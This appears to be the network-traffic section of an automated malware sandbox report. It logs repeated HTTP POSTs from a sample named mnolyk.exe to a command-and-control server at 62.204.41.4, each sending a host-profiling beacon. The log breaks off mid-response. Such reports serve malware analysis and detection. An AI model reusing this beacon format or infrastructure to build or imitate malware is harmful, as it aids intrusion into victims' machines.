                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:40.457307100 CET687OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.522316933 CET687INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    488192.168.2.35019162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:40.706397057 CET688OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.770910978 CET688INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    489192.168.2.35019262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:40.958822966 CET689OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.021773100 CET689INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    49192.168.2.34975162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:28.918585062 CET250OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.981673002 CET250INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    490192.168.2.35019362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:41.207055092 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.273262978 CET690INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    491192.168.2.35019462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:41.460819006 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.522612095 CET691INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    492192.168.2.35019562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:41.704353094 CET692OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.769680977 CET692INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    493192.168.2.35019662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:41.941741943 CET693OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.006381035 CET693INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    494192.168.2.35019762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:42.188563108 CET694OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.254254103 CET694INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    495192.168.2.35019862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:42.429543972 CET695OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.494379997 CET695INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    496192.168.2.35019962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:42.673837900 CET696OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.738421917 CET696INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    497192.168.2.35020062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:42.926769972 CET697OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.995301008 CET697INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    498192.168.2.35020162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:43.176177025 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:43.243904114 CET698INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    499192.168.2.35020262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:43.422784090 CET699OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:43.487746000 CET699INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    5192.168.2.34970662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:10.701281071 CET205OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:10.763241053 CET206INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    50192.168.2.34975262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:29.152514935 CET251OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.218450069 CET251INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    500192.168.2.35020362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:43.656635046 CET700OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:43.720843077 CET700INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    501192.168.2.35020462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:43.896147013 CET701OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:43.961380959 CET701INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    502192.168.2.35020562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:44.143096924 CET702OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:44.209775925 CET702INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    503192.168.2.35020662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:44.396612883 CET703OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:44.460964918 CET703INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
